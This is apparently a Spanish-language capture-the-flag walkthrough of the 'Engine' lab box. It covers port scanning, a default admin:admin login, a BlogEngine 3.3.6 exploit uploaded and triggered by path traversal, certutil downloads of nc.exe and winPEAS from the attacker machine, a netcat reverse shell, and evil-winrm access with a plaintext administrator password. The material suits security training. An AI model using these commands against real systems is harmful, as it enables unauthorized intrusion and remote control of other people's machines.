nmap -A -p- -oA engine 172.31.1.16 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA engine 172.31.1.16

nmap -sU -O -p- -oA engine-udp 172.31.1.16

nikto -h 172.31.1.16:80

gobuster dir -k -u http://172.31.1.16/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210707091011.png

Pasted image 20210707090344.png

Usamos las credenciales admin:admin

Pasted image 20210707090504.png

Vemos que es la version 3.3.6

Pasted image 20210707090609.png

Buscamos con searchsploit blogengine 3.3.6

searchsploit blogengine -w

Le damos click al 46353

Y copiamos el codigo a un archivo llamado PostView.ascx Cambiamos la ip a la de la maquina kali en el codigo:

Pasted image 20210707094328.png

Nos dirigimos a http://172.31.1.16/admin/app/editor/editpost.cshtml

Pasted image 20210707094522.png

Nos dirigimos a http://172.31.1.16/blog?theme=../../App_Data/files

Pasted image 20210707094804.png

Pasted image 20210707095341.png

python3 -m http.server 8888

certutil -urlcache -split -f http://10.10.0.12:8888/nc.exe nc.exe

Pasted image 20210707095703.png

start /b nc.exe -e cmd.exe 10.10.0.12 3333

nc -lvnp 3333

Pasted image 20210707095854.png

python3 -m http.server 8888

certutil -urlcache -split -f http://10.10.0.12:8888/winPEASany.exe winPEASany.exe

Pasted image 20210707100059.png

Vemos unas credenciales de administrador al correr winpeas

Pasted image 20210707100336.png

evil-winrm -i 172.31.1.16 -u Administrator -p PzCEKhvj6gQMk7kA

boxes

copyright©2022 Cu3rv0x all rights reserved